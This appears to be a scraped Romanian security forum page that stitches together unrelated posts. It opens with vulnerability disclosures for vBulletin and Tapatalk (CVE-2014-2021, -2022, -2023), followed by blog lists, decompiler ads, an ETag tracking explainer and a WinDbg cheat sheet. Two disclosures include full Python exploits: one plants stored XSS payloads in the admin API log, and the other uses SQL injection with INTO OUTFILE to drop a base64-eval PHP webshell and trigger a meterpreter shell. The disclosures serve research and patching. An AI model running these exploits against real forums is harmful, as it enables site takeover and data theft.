CVE-2014-2021 - vBulletin 5.x/4.x - persistent XSS in AdminCP/ApiLog via xmlrpc API (post-auth) Overview date : 10/12/2014 cvss : 4.6 (AV:N/AC:H/Au:S/C:P/I:P/A:P) base cwe : 79 vendor : vBulletin Solutions product : vBulletin 4 versions affected : latest 4.x and 5.x (to date); verified <= 4.2.2 ; <= 5.0.x * vBulletin 5.0.5 (verified) * vBulletin 4.2.2 (verified) * vBulletin 4.2.1 (verified) * vBulletin 4.2.0 PL2 (verified) exploitability : * remotely exploitable * requires authentication (apikey) * requires non-default features to be enabled (API interface, API-Logging) * requires user interaction to trigger exploit (admincp - admin views logs) patch availability (to date) : None Abstract vBulletin 4/5 does not properly sanitize client provided xmlrpc attributes (e.g. client name) allowing the remote xmlrpc client to inject code into the xmlrpc API logging page. Code is executed once an admin visits the API log page and clicks on the API clients name. risk: rather low - due to the fact that you the api key is required you can probably use CVE-2014-2023 to obtain the api key Details vulnerable component: ./admincp/apilog.php?do=viewclient apilog.php does not sanitize xmlrpc client provided data before passing it to print_label_row to generate the output page. Proof of Concept (PoC) see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021 1) prerequesites 1.1) enable API, generate API-key logon to AdminCP goto "vBulletin API"->"API-Key" and enable the API interface, generate key goto "vBulletin API"->"API-Log" and enable all API logging 2) run PoC edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL) run PoC, wait for SUCCESS! message 3) trigger exploit logon to AdminCP goto "vBulletin API"->"API-Log" and hit "view" in search results click on "client name" the injected msgbox pops up Timeline 2014-01-14: initial vendor contact - no reply 2014-01-24: vendor contact - no reply 2014-10-13: public disclosure Contact tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021 (0x721427D8) #!/usr/bin/env python# -*- coding: utf-8 -*- ''' @author: tintinweb 0x721427D8 ''' import urllib2, cookielib, urllib, json, hashlib class Exploit(object): baseurl = None cookies = None def __init__(self,baseurl,params, debuglevel=1): self.cookies = cookielib.LWPCookieJar() handlers = [ urllib2.HTTPHandler(debuglevel=debuglevel), urllib2.HTTPSHandler(debuglevel=debuglevel), urllib2.HTTPCookieProcessor(self.cookies) ] self.browser = urllib2.build_opener(*handlers) self.baseurl=baseurl self.params = params def call(self,path="",data={}): assert(isinstance(data,dict)) data = urllib.urlencode(data) req = urllib2.Request("%s%s"%(self.baseurl,path),data) req.add_header("Content-Type", "application/x-www-form-urlencoded") return self.browser.open(req) def call_json(self,path=None,data={}): try: x=self.call(path,data).read() print "raw_response", x resp = json.loads(x) except urllib2.HTTPError, he: resp = he.read() return resp def vb_init_api(self): params = {'api_m':'api_init'} params.update(self.params) data = self.call_json("?%s"%(urllib.urlencode(params))) self.session = data return data def vb_call(self, params): api_sig = self._vb_build_api_sig(params) req_params = self._vb_build_regstring(api_sig) params.update(req_params) data = self.call_json("?%s"%(urllib.urlencode(params)),data=params) if not isinstance(data, dict): return data if 'errormessage' in data['response'].keys(): raise Exception(data) return data def _ksort(self, d): ret = [] for key, value in [(k,d[k]) for k in sorted(d.keys())]: ret.append( "%s=%s"%(key,value)) return "&".join(ret) def _ksort_urlencode(self, d): ret = [] for key, value in [(k,d[k]) for k in sorted(d.keys())]: ret.append( urllib.urlencode({key:value})) return "&".join(ret) def _vb_build_api_sig(self, params): apikey = self.params['apikey'] login_string = self._ksort_urlencode(params) access_token = str(self.session['apiaccesstoken']) client_id = str(self.session['apiclientid']) secret = str(self.session['secret']) return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest() def _vb_build_regstring(self, api_sig): params = { 'api_c':self.session['apiclientid'], 'api_s':self.session['apiaccesstoken'], 'api_sig':api_sig, 'api_v':self.session['apiversion'], } return params if __name__=="__main__": TARGET = "http://localhost:8008/sectest/vbulletin_5/api.php" APIKEY = "G4YvWVhp" DEBUGLEVEL = 0 # 1 to enable request tracking print "vBulletin 5.x / 4.x - XSS in API" ### 1. XSS ''' vbulletin: admincp => settings: options => vbulletin API and Mobile Application Options * enable vbulletin API = yes * enable API log = yes xss in: 1) http://xxxx/vb/admincp/apistats.php?do=client 2) click on hex<video><source/**/onerror='alert(1)'>hex 2.1) e.g. http://xxxx/vb/admincp/apilog.php?do=viewclient&apiclientid=1 ''' params = {'clientname':"hex<video><source/**/onerror='alert(/clientname_1/)'>hex1", 'clientversion':"hex<video><source/**/onerror='alert(2)'>hex2", 'platformname':"hex<video><source/**/onerror='alert(3)'>hex3", 'platformversion':"hex<video><source/**/onerror='alert(4)'>hex4", 'uniqueid':"hex<video><source/**/onerror='alert(5)'>hex5", 'apikey':APIKEY} print "[ 1 ] - xss - inject alert() to admincp" x = Exploit(baseurl=TARGET,params=params,debuglevel=DEBUGLEVEL) vars = x.vb_init_api() print vars """ $calls = array( 'methods' => array( 'login_login', 'api_init' ), 'login_login' => array( 'POST' => array( 'vb_login_username' => 'admin', 'vb_login_password' => 'password', ), ), 'api_init' => array( 'sessionhash' => '{session.dbsessionhash}' ) ); """ print " [*] GOT SESSIONHASH:",vars.get('sessionhash','<no-sessiohash>') ''' calls = {'methods':['api_init'], 'api_init':{ 'sessionhash':vars['sessionhash'] }} ''' # just a dummy call x.vb_call(params={'api_m':'api_forumlist', 'type':'t', 'x':"1"}) print "[ *] SUCCESS! - now make an admin visit %s/admincp/apilog.php?do=viewclient&apiclientid=%s to trigger the XSS :)"%("/".join(TARGET.split("/")[:-1]),vars['apiclientid']) print "-- quit --" Sursa: https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2021 Exploit: https://github.com/tintinweb/pub/blob/master/pocs/cve-2014-2021/poc_cve-2014-2021.py

CVE-2014-2022 - vbulletin 4.x - SQLi in breadcrumbs via xmlrpc API (post-auth) Overview date : 10/12/2014 cvss : 7.1 (AV:N/AC:H/Au:S/C:C/I:C/A:C) base cwe : 89 vendor : vBulletin Solutions product : vBulletin 4 versions affected : latest 4.x (to date); verified <= 4.2.2 * vBulletin 4.2.2 (verified) * vBulletin 4.2.1 (verified) * vBulletin 4.2.0 PL2 (verified) exploitability : * remotely exploitable * requires authentication (apikey) patch availability (to date) : None Abstract vBulletin 4 does not properly sanitize parameters to breadcrumbs_create allowing an attacker to inject arbitrary SQL commands (SELECT). risk: rather low - due to the fact that you the api key is required you can probably use CVE-2014-2023 to obtain the api key Details vulnerable component: ./includes/api/4/breadcrumbs_create.php vulnerable argument: conceptid which is sanitized as TYPE_STRING which does not prevent SQL injections. Proof of Concept (PoC) see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2022 1) prerequesites 1.1) enable API, generate API-key logon to AdminCP goto "vBulletin API"->"API-Key" and enable the API interface, generate key 2) run PoC edit PoC to match your TARGET, APIKEY (, optionally DEBUGLEVEL) provide WWW_DIR which is the place to write the php_shell to (mysql must have permissions for that folder) Note: meterpreter_bind_tcp is not provided run PoC, wait for SUCCESS! message Note: poc will trigger meterpreter shell meterpreter PoC scenario requires the mysql user to have write permissions which may not be the case in some default installations. Timeline 2014-01-14: initial vendor contact, no response 2014-02-24: vendor contact, no response 2014-10-13: public disclosure Contact tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2022 (0x721427D8) #!/usr/bin/env python# -*- coding: utf-8 -*- ''' @author: tintinweb 0x721427D8 ''' import urllib2, cookielib, urllib, json, hashlib class Exploit(object): baseurl = None cookies = None def __init__(self,baseurl,params, debuglevel=1): self.cookies = cookielib.LWPCookieJar() handlers = [ urllib2.HTTPHandler(debuglevel=debuglevel), urllib2.HTTPSHandler(debuglevel=debuglevel), urllib2.HTTPCookieProcessor(self.cookies) ] self.browser = urllib2.build_opener(*handlers) self.baseurl=baseurl self.params = params def call(self,path="",data={}): assert(isinstance(data,dict)) data = urllib.urlencode(data) req = urllib2.Request("%s%s"%(self.baseurl,path),data) req.add_header("Content-Type", "application/x-www-form-urlencoded") return self.browser.open(req) def call_json(self,path=None,data={}): try: x=self.call(path,data).read() print "raw_response", x resp = json.loads(x) except urllib2.HTTPError, he: resp = he.read() return resp def vb_init_api(self): params = {'api_m':'api_init'} params.update(self.params) data = self.call_json("?%s"%(urllib.urlencode(params))) self.session = data return data def vb_call(self, params): api_sig = self._vb_build_api_sig(params) req_params = self._vb_build_regstring(api_sig) params.update(req_params) data = self.call_json("?%s"%(urllib.urlencode(params)),data=params) if not isinstance(data, dict): return data if 'errormessage' in data['response'].keys(): raise Exception(data) return data def _ksort(self, d): ret = [] for key, value in [(k,d[k]) for k in sorted(d.keys())]: ret.append( "%s=%s"%(key,value)) return "&".join(ret) def _ksort_urlencode(self, d): ret = [] for key, value in [(k,d[k]) for k in sorted(d.keys())]: ret.append( urllib.urlencode({key:value})) return "&".join(ret) def _vb_build_api_sig(self, params): apikey = self.params['apikey'] login_string = self._ksort_urlencode(params) access_token = str(self.session['apiaccesstoken']) client_id = str(self.session['apiclientid']) secret = str(self.session['secret']) return hashlib.md5(login_string+access_token+client_id+secret+apikey).hexdigest() def _vb_build_regstring(self, api_sig): params = { 'api_c':self.session['apiclientid'], 'api_s':self.session['apiaccesstoken'], 'api_sig':api_sig, 'api_v':self.session['apiversion'], } return params if __name__=="__main__": TARGET = "http://192.168.220.131/vbb4/api.php" APIKEY = "4FAVcRDc" REMOTE_SHELL_PATH = "/var/www/myShell.php" TRIGGER_URL = "http://192.168.220.131/myShell.php" DEBUGLEVEL = 0 # 1 to enable request tracking ### 2. sqli - simple - write outfile print "[ 2 ] - sqli - inject 'into outfile' to create file xxxxx.php" params = {'clientname':'fancy_exploit_client', 'clientversion':'1.0', 'platformname':'exploit', 'platformversion':'1.5', 'uniqueid':'1234', 'apikey':APIKEY} x = Exploit(baseurl=TARGET,params=params) vars = x.vb_init_api() print vars ''' x.vb_call(params={'api_m':'breadcrumbs_create', 'type':'t', #'conceptid':"1 union select 1 into OUTFILE '%s'"%REMOTE_SHELL_PATH, 'conceptid':"1 union select 1 into OUTFILE '%s'"%(REMOTE_SHELL_PATH) }) print "[ *] SUCCESS! - created file %s"%TRIGGER_URL ''' ### 3. sqli - put meterpreter shell and trigger it print "[ 3 ] - sqli - meterpreter shell + trigger" with open("./meterpreter_bind_tcp") as f: shell = f.read() shell = shell.replace("<?php","").replace("?>","") #cleanup tags shell = shell.encode("base64").replace("\n","") #encode payload shell = "<?php eval(base64_decode('%s')); ?>"%shell # add decoderstub shell = "0x"+shell.encode("hex") # for mysql outfile x.vb_call(params={'api_m':'breadcrumbs_create', 'type':'t', 'conceptid':"1 union select %s into OUTFILE '%s'"%(shell,REMOTE_SHELL_PATH)}) print "[ *] SUCCESS! - triggering shell .. (script should not exit)" print "[ ] exploit: #> msfcli multi/handler PAYLOAD=php/meterpreter/bind_tcp LPORT=4444 RHOST=<TARGET_IP> E" print "[ *] shell active ... waiting for it to die ..." print urllib2.urlopen(TRIGGER_URL) print "[ ] shell died!" print "-- quit --" Sursa: https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2022 Exploit: https://github.com/tintinweb/pub/blob/master/pocs/cve-2014-2022/poc_cve-2014-2022.py

[h=1]CVE-2014-2023 - Tapatalk for vbulletin 4.x - multiple blind sql injection (pre-auth)[/h] [h=2]Overview[/h] date : 10/12/2014 cvss : 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) base cwe : 89 vendor : Tapatalk Inc product : Tapatalk for vBulletin 4.x versions affected: latest (to date) 5.2.1 (verified) 4.9.0 (verified) exploitability : * remotely exploitable * NO authentication required * NO user interaction required * NO special configuration required (default settings) [h=2]Abstract[/h] Tapatalk for vBulletin 4.x does not properly sanitize some xmlrpc calls allowing unauthenticated users to inject arbitrary SQL commands. risk: high !! Note !! - this is a preliminary VulnNote. The full PoC / Description will be made available within the next 7 days (see contact) to allow mobiquo to fix this. googledork: see PoC code [h=2]Details[/h] vulnerable component: * stripped // see full VulnNote - (contact) xmlrpc request is decoded, decoded attacker provided values are directly being used in sql query. [h=2]Proof of Concept (PoC)[/h] see https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023 1) prerequesites vBulletin 4.x with Tapatalk for vBulletin 4.x installed 2) run PoC edit PoC to match your TARGET (, optionally DEBUG=True) (optionally) edit your query to extract specific database values Note: PoC will try to detect tapatalk on that host run PoC by default extracts * mysql root hash (in case vBulletin db user has permissions to do so) * vbulletin db record fields (apikey) - perfectly chains with CVE-2014-2023 only limited by the vBulletin db_user access permissions [h=2]Timeline[/h] 2014-01-14: initial vendor contact, no response 2014-02-24: vendor contact, no response 2014-10-13: public disclosure [h=2]Contact[/h] tintinweb - https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023 Sursa: https://github.com/tintinweb/pub/tree/master/pocs/cve-2014-2023

Le voi posta la Exploit-uri in urmatoarele 10 minute.

Salut, Din cauza unor probleme de securitate cu jegul asta, am decis sa il scoatem. Cativa membri au gasit in trecut niste XSS-uri, iar acum a aparut (inca nu e public) un SQL Injection. Muie Tapatalk! De asemenea, s-au mai descoperit vreo 2 SQL Injection in vBulletin, dar exploatarea e ceva mai dificila. Oricum pe acestea le-am fixat. Muie vBulletin! Ne cerem scuze pentru aceste probleme.

Bre, e un SHELLCODE, nu un EXPLOIT! Use case: - se da una bucata exploit (* buffer overflow sau altceva) intr-un software care ruleaza ca root (ProFTPD, PostFix sau mai stiu eu ce). E NECESAR! - se ruleaza acel exploit folosind acest shellcode, rezultatul fiind un nou cont cu permisiuni de root. Acel chmod poate fi util in anumite conditii. - se logheaza frumos pe SSH cu noul cont Nota: in urma executarii exploit-ului procesul poate sa crape. Si in cazul de fata ai chiar acest avantaj: poate sa crape procesul, tu ai deja acces full pe server. Se putea face backconnect de exemplu, dar aici apar probleme de iptables (firewall). La fel si cu port bind. V-ati prins?

[h=2]Introduction[/h] How do we stay up-to-date with the latest security news? Where do we find the best security solutions to fight malware? Who can we follow to learn about the latest threats and online attacks so that we can protect ourselves? With security in our minds, no matter we are common people or a big company name, we need to understand technology if we want to prevent data loss and privacy breaches. But with so many security blogs out there, which one should we follow? We have put together a list of security blogs from independent individuals and big names in the IT industry, so that you can benefit from their knowledge and insight. Therefore, if you need best practices, how-to articles, online safety research or the latest security news, feel free to bookmark this article and access it whenever you feel necessary. [h=2]The List[/h] [h=3]1. Krebs on Security[/h] Brian Krebs is the man behind Krebs on Security. Being hacked himself in 2001, he takes a personal interest in online security and is one of the well-known names in today’s security landscape. He covers topics from latest threats, privacy breaches and cyber-criminals to major security news. [h=3]2. Schneier on Security[/h] Bruce Schneider is probably the most well-known name that you can recognize in our list, and was even called a “security guru” by The Economist. He wrote books, hundreds of articles, essays and security papers on security matters. At the same time, he is a known figure in the media environment which recognize him as an important voice for the online security, not only for his knowledge on the matter, but also because he knows how to express his opinions. [h=3]3. TaoSecurity[/h] This security blog is run by Richard Bejtlich, Chief Security Officer at Mandiant and author of many books on security. With an extensive background on cyber-criminal world and malicious attacks on enterprise networks, he shares his experience on digital defense, network monitoring and detection on his security blog. Since a great number of network attacks come from China, he is specialized on Chinese online criminals. [h=3]4. US-CERT[/h] This is the official website of the Department of Homeland Security, from USA. Though it is not a classical security blog, its purpose is to improve Internet security by providing specialized and well detailed information on cyber-criminal activities, malware, phishing attempts and online threats. To use their own words: “US-CERT strives for a safer, stronger Internet for all Americans by responding to major incidents, analyzing threats, and exchanging critical cyber-security information with trusted partners around the world.” [h=3]5. Dark Reading[/h] Dark Reading is a widely-read cyber security site that addresses professionals from the IT environment, security researchers and technology specialists. They use their experience and knowledge to provide articles, recommendations, news and information on IT security. [h=3]6. CIO[/h] CIO is the place where you find news, information technology articles, insight and analysis on major data breaches and online threats. Covering multiple aspects of world wide web, it provides in-depth, content rich information for IT professionals and normal users. [h=3]7. Network Security Blog[/h] Martin McKeay is the voice of this security blog, where you can find information and news on privacy and security issues. As Martin says: “I took up blogging as a means to extend my knowledge and test my ideas about security…” [h=3]8. Security Watch with Neil Rubenking[/h] Known for his direct and witty style, Neil Rubenking is the man you have to listen if you search for technical advice on the main security solutions, from firewalls, antivirus and antispam products to full security suites. Detailed reports and sharp analysis of security programs place him be on your follow list if you look for this type if information. [h=3]9. Paul’s Security Weekly[/h] Paul’s Security Weekly, founded by Paul Asadoorian, brings you security news, useful technical articles, research studies and valuable information on hacking and cyber-crime through various channels, from blog posts, videos to podcasts. [h=3]10. PCMag.com[/h] One of the most popular sites in the software industry, PC Magazine comes with reviews and studies on the latest products for online security. For an objective analysis of a product you may be looking, don’t forget to look for the dedicated article on this website. [h=3]11. Wired[/h] One of the classical North American publications reporting on technology and its role in culture, economy and politics, Wired approaches topics on online privacy, cyber-criminal threats, systems security and the latest alerts. [h=3]12. Forbe’s Firewall[/h] Forbe’s Firewall comes from one of the leading media company in the online environment and provides strong analysis, reliable tools and real-time reports for cyber-security news and information on the latest online threats. [h=3]13. TechRepublic[/h] TechRepublic provides large resources for the online industry, such as blog articles, forums, technical papers and security data. All the valuable information available helps IT professionals and technology leaders to come with the best decissions on their business processes. [h=3]14. Zero Day[/h] The Zero Day security blog is important for all the people which are part of the IT industry and you should follow it to stay up-to-date with the latest security analysis, software vulnerabilities, malware attacks and network threats. [h=3]15. Securosis[/h] Securosis is a security research and advisory company that offers security services for companies and organizations. At the same time, you can find on their security blog some useful articles and insight on managing and protecting online data. [h=3]16. The Guardian Information Security Hub[/h] Known for its quality articles on world news, Guardian offers a section dedicated to information security for companies and individuals. To stay up-to-date with the latest articles and news on cyber security, make sure you follow this site. [h=3]17. Help Net Security[/h] This security site is a popular place for data and security news and you can find here the latest information and articles related to the IT industry. [h=3]18. Techworld Security[/h] The section dedicated to security on this site analyzes the latest malware threats and zero-day exploits. You can find here other important topics and subjects, such as security articles, how-to documents and software reviews. [h=3]19. Fox IT Security Blog[/h] This security blog is a very good source of information on online security, technology news and cyber crime defense. [h=3]20. SC Magazine[/h] SC Magazine comes in the IT environment with technical information and data analysis to fight the present online security threats. Their site provides testing results for e-mail security, mobile devices, cloud and web security. [h=3]21. Network Computing[/h] The content of this security blog focuses on cloud technology and enterprise infrastructure systems. Its published articles cover security solutions on how to deliver applications and services for an increasingly large threat environment in the business world, news and expert advice. [h=3]22. Infosecurity Magazine[/h] Infosecurity Magazine is an online magazine which covers not only security articles on popular topics, but is also dedicated to security strategy, valuable insights and technical approaches for the online industry. [h=3]23. SANS Institute AppSec Blog[/h] This security site addresses the growing malware threats in the online world by providing training, research, certification and educational resources for IT specialists. [h=3]24. Threat Track Security[/h] This security blog keeps you up-to-date with the latest innovations and developments in the IT industry, from security exploits to software vulnerabilities and cyber-criminal attempts. [h=3]25. CSO Online[/h] CSO focuses on information technology, access management for enterprise servers, loss prevention, cybercriminal threats and software vulnerabilities. [h=2]Security blogs from software providers in the IT industry[/h] [h=3]26. Sophos security blog[/h] Naked Security is Sophos’s award-winning threat news room, giving you news, opinion, advice and research on computer security issues and the latest internet threats. Naked Security is the blog of security company SOPHOS and the place where you can find news, research studies, advices and opinions. Categories range from mobile security threats to operating systems and malware articles. Naked Security is updated multiple times per day and receives around 1.5 million pageviews per month. It has won numerous awards and it is considered one of the best security blogs. [h=3]27. Kaspersky Lab’s ThreatPost[/h] Threatpost is the leading security news website that is part of The Kaspersky Lab. Their articles cover important stories and relevant security news for the online world. They are recognized as an important source of news for online security in important newspapers and publications, such as New York Times, USA Today or The Wall Street Journal. [h=3]28. Kaspersky Lab’s Securelist[/h] Securelist is a security blog run by Kaspersky Lab and it addresses a large audience, providing some of the best security subjects on cybercriminal activities and data stealing malware. You can find here security information that focuses on malware, phishing and other threats from the cyber security world. [h=3]29. Symantec Weblog[/h] Symantec Weblog is a security blog from one of the biggest providers of security solutions world wide, Symantec. Using their technical knowledge and data collected along the years, they come with strong analysis reports and articles on security threats, online criminals, data stealing malware, system vulnerbilities and many others. [h=3]30. Google Online Security Blog[/h] We are surrounded by Google products and services, from their search engine to their web browser, so it is normal to include their security blog in our list. It is a reliable security blog and even more, a reference point on online security and privacy we need to acknowledge. [h=3]31. Zone Alarm Cyber Security Blog[/h] The security blog from ZoneAlarm, one of the well-known vendors of security products, provides valuable information on malware defense and online security. Using their experience on malware, this security blog generates malware alerts, practical security tips and the latest news in the IT industry. [h=3]32. F-Secure Safe & Savvy Blog[/h] A security blog from F-Secure, a company dedicated to online content and privacy protection. On this security blog you will find helpful tips and advises on security issues, from protecting your personal identity to keeping your system safe. [h=3]33. HotforSecurity[/h] The security blog from Bitdefender – one of the leading companies on online security solutions, covers various subjects from the IT world, from Internet scams, online spam and phishing to malware and data stealing software. [h=3]34. McAfee security blog[/h] McAfee security blog provides the latest tips and techniques from security experts to keep you up-to-date with the latest malware trends in the online environment. [h=3]35. Microsoft Malware Protection Center[/h] The Microsoft Malware Protection Center analyzes data from all over the world to provide insight and valuable information on fighting online threats in order to protect users from malware attacks and online crime. [h=3]36. SpiderLabs Security Blog[/h] Investigators and researchers at Trustwave cover the latest technology news on this security blog. Gathering information from research and testing, they publish articles and security studies to fight online hackers and cyber-criminal threats. [h=3]37. Dell SecureWorks[/h] The security blog from Dell SecureWorks provides the latest news and information for IT professionals and users that need to stay up-to-date with online threats and malware attacks. [h=3]38. Malwarebytes Security Blog[/h] The Malwarebytes security blog articles cover the latest malware threats and cyber criminal attempts from the online world. You can find their articles on categories, from cyber-crime, exploits, hacking and malware analysis. [h=3]39. Trend Micro Simply Security[/h] Trend Micro Simply Security site offers expert insights on cloud security, data safety, privacy protection and threat intelligence. [h=3]40. We Live Security[/h] We Live Security, the Eset blog, is an online resource for cyber security articles and this blog covers a large network of security topics from emerging online threats to zero-day exploits. [h=2]Conclusions[/h] We know our list is not perfect, there are so many other security blogs and top influencers in the IT industry that we have not included and we can not assume this list is complete. We try to stay in tune with the latest updates in the industry and we provided a few reasons why you should follow the security blogs above. But, since the Internet world and the security landscape is changing all the time, so must we. So, help us improve our article, let us know what you think, we have no problem in making changes to our article and improve it for the benefit of all. Autor: Aurelian Neagu Sursa: https://heimdalsecurity.com/blog/best-internet-security-blogs/

Da, interesanta ideea. Nu va chinuiti sa scanati in masa, aveti nevoie de user si pass, trebuie sa va autentificati.

General Machine Code to C Decompiler Free Windows I64 target edition Interactive Windows GUI C Decompiler Features Global Analysis While function analysis alone provides information of the function’s control flow, only global program analysis can reveal the full details of the function’s interaction with the program. Type Detection and Propagation Data types are deduced from operations performed on the data and then propagated and synchronized globally. Full Data Flow Analysis Machine code has to work around CPU characteristics like the limited number of registers or operator location restrictions. Full data flow analysis facilitates the elimination of irrelevant data transfers and provides clear and short C code. Machine Code to C The low level features of C allow expressing most machine code functions in C. It is not relevant if the function was initially written in C or any other stack frame based language, including Assembler. Interactive Static decompilation has its limits and needs user guidance to provide missing context. Interactive manipulations, directly at the source allow you to guide the decompilation process. E.g. change a function’s ABI to restrict its return value locations or add missing destinations to a computed call. No Compiler Detection Global analysis provides the information to make compiler based assumptions obsolete. General compiler patterns are only employed as a last resort to resolve situations where information are missing, e.g. both, a called function’s code and its signature are not available. Function Signatures Library Detection of known functions from static compiler libraries shortens the decompile process and introduces additional type information. The build-in signature generator enables the user to extend the library with required signatures. Showcase Interactive Selecting a C source code token highlights related token and shows the properties of the underlying object in a separate view. Tooltips provide quick information for the token under the mouse pointer. Context Menus Context Menus are available in the Source View, Function Tree and the Properties View. They are tailored to the selected token and give quick access to the relevant control actions. Properties All relevant details of a selected token are presented in the Properties View. Issue View Relevant decompile events are presented by informative Issues and navigation and control actions. Function Tree The function tree for navigation and quick access to function control actions. C/Assembler Mix The underlying assembler code can be embedded in the generated C code. Sursa: C4Decompiler, the C Decompiler for Windows x64 Download: Download C Decompiler for Windows – C4Decompiler.com

Decompile APK. Mark-up your analysis. Leverage our API. JEB is the most powerful Android app decompiler, built by and for security engineers, and allows them to do their job faster and more efficiently. Features See how JEB makes APK decompilation and Android decompilation easy: Full-fledged Dalvik decompiler. At its core, JEB's unique feature is its ability to directly decompile Dalvik bytecode to Java source code. This approach offers many advantages, as our in-house decompiler is aware of and takes into consideration many Dalvik subtleties, and makes wise use of the metadata present in the DEX file. (See how JEB compares against other tools.) Interactivity. Analysts need flexible tools, especially when they deal with obfuscated or protected pieces of code. JEB's powerful UI allows you to examine cross-references, rename methods, fields, classes and packages, navigate between code and data, take notes, add inline comments, and more. Full APK view. Take advantage of the full APK view, including decompressed manifest, resources, certificates, strings, constants, etc. Again, flexibility is key. API for Automation. Use JEB's Application Programming Interface (API) to write Python scripts and plugins, and automate your analysis needs. Track your progress. What would hours of research and analysis mean if you or your team couldn't pick up from where you left off? Save your analysis to binary files, track progress through JEB's revision history mechanism Technical support. Enjoy our responsiveness. We are also committed to frequent release cycles to make sure JEB stays at the top of its game. Multi-platform. JEB runs on Windows, Linux and Mac OS. Read More : http://www.android-d...r.com/index.php DepositFiles Screenshots: Interactive Disassembly Decompiled Java XML Manifest Resource Tree Certificates A Look at the Options Sursa: JEB - The Interactive Android Decompiler - EXETOOLS FORUM

La tine am vazut si am postat la Tutoriale. E ok si aici, trebuie citit.

[h=2]Cookieless cookies[/h] There is another obscure way of tracking users without using cookies or even Javascript. It has already been used by numerous websites but few people know of it. This page explains how it works and how to protect yourself. This tracking method works without needing to use: Cookies Javascript LocalStorage/SessionStorage/GlobalStorage Flash, Java or other plugins Your IP address or user agent string Any methods employed by Panopticlick Instead it uses another type of storage that is persistent between browser restarts: caching. Even when you disabled cookies entirely, have Javascript turned off and use a VPN service, this technique will still be able to track you. [h=3]Demonstration[/h] As you read this, you have already been tagged. Sorry. The good news is that I don't link your session id to any personally identifiable information. Here is everything I store about you right now: Number of visits: 2 Last visit: Thu, 09 Oct 2014 15:34:32 +0200 Want to store some text here? (max. 350 characters) Go ahead, type something and store it. Then close your browser and open this page again. Is it still there? Check your cookies, is anything there? Nope, it's all in a fake image checksum that almost noone is aware of. Saw that eye on the right top of the page? That's our tracker. [h=3]So how does this work?[/h] This is a general overview: The ETag shown in the image is a sort of checksum. When the image changes, the checksum changes. So when the browser has the image and knows the checksum, it can send it to the webserver for verification. The webserver then checks whether the image has changed. If it hasn't, the image does not need to be retransmitted and lots of data is saved. Attentive readers might have noticed already how you can use this to track people: the browser sends the information back to the server that it previously received (the ETag). That sounds an awful lot like cookies, doesn't it? The server can simply give each browser an unique ETag, and when they connect again it can look it up in its database. Technical stuff (and bugs) specifically about this demo To demonstrate how this works without having to use Javascript, I had to find a piece of information that's relatively unique to you besides this ETag. The image is loaded after the page is loaded, but only the image contains the ETag. How can I display up to date info on the page? Turns out I can't really do that without dynamically updating the page, which requires javascript, which I wanted to avoid to show that it can be done without. This chicken and egg problem introduces a few bugs: - All information you see was from your previous pageload. Press F5 to see updated data. - When you visit a page where you don't have an ETag (like incognito mode), your session will be emptied. Again, this is only visible when you reload the page. I did not see a simple solution to these issues. Sure some things can be done, but nothing that other websites would use, and I wanted to keep the code as simple and as close to reality as possible. Note that these bugs normally don't exist when you really want to track someone because then you don't intend to show users that they are being tracked. Source code What's a project without source code? Oh right, Microsoft Windows. https://github.com/lucb1e/cookielesscookies [h=3]What can we do to stop it?[/h] One thing I would strongly recommend you to do anytime you visit a page where you want a little more security, is opening a private navigation window and using https exclusively. Doing this single-handedly eliminates attacks like BREACH (the latest https hack), disables any and all tracking cookies that you might have, and also eliminates cache tracking issues like I'm demonstrating on this page. I use this private navigation mode when I do online banking. In Firefox (and I think MSIE too) it's Ctrl+Shift+P, in Chrome it's Ctrl+Shift+N. Besides that, it depends on your level of paranoia. I currently have no straightforward answer since cache tracking is virtually undetectable, but also because caching itself is useful and saves people (including you) time and money. Website admins will consume less bandwidth (and if you think about it, in the end users are the ones that will have to pay the bill), your pages will load faster, and especially on mobile devices it makes a big difference if you don't have an unlimited 4G plan. It's even worse when you have a high-latency or low-bandwidth connection because you live in a rural area. If you're very paranoid, it's best to just disable caching altogether. This will stop any such tracking from happening, but I personally don't believe it's worth the downsides. The Firefox add-on Self-Destructing Cookies has the ability to empty your cache when you're not using your browser for a while. This might be an okay alternative to disabling caching; you can only be tracked during your visit, and they can already do that anyway by following which pages were visited by which IP address, so that's no big deal. Any later visits will appear as from a different user, assuming all other tracking methods have already been prevented. I'm not aware of any add-on that periodically removes your cache (e.g. once per 72 hours), but there might be. This would be another good alternative for 99% of the users because it has a relatively low performance impact while still limiting the tracking capabilities. Update: I've heard the Firefox add-on SecretAgent also does ETag overwriting to prevent this kind of tracking method. You can whitelist websites to re-enable caching there while blocking tracking by other domains. It has been confirmed that this add-on stops the tracking. SecretAgent's website. SURSA: Lucb1e.com :: Cookieless Cookies

Nu am facut kernel debugging, dar http://alexandreborgesbrazil.files.wordpress.com/2014/03/intro_win_debugging.pdf .

Am inceput sa folosesc mai des WinDbg (IDA sucks in unele privinte) si mi-am facut o lista cu comenzile utile. ? - Regular commands help ?? expr - Evaluate C++ expression $$ comment - Add comment ~ - All threads ~. - Current thread ~. k - Current thread stack ~* k - All threads stack .cls - Clear screen .help - Display . commands .hh text - Open Help and search text .lastevent - Last exception/event .time - Kernel and user time .tthread - Thread time .attach - Attach to process with PID .detach - Detach from process .restart - Restart application .symfix - Set default symbol path .reload - Reload all symbols .tlist - List all processes !Ext.help - General extensions !Exts.help - Other extensions !Uext.help - User-mode extensions !Wdfkd.help - Kernel-mode extensions !analyze -v - Information about current exception !threads - Detalied threads info !address -summary - Memory addresses !heap -s - Heap info !runaway - Time of all threads !teb - Thread Environment Block !peb - Process Environment Block !dlls - Loaded modules (+options) !lmi chrome.dll - Module information !dh kernel32.dll - Display PE headers and sections !tls - Thread Local Storage !gle - Dump last errors (by threads) !error ERR - Display error text info !uniqstack - Stack for all threads !address Addr - Display info about address !mapped_file Addr - File containing that address g - Go gu - Go up (until function complete) q - End debug session p - Single step pt - Step to next return pc - Step to next call pa Addr - Step until addr lm / lmf - Loaded modules lm vm chrome - Module information ld * / module - Load symbols n 10 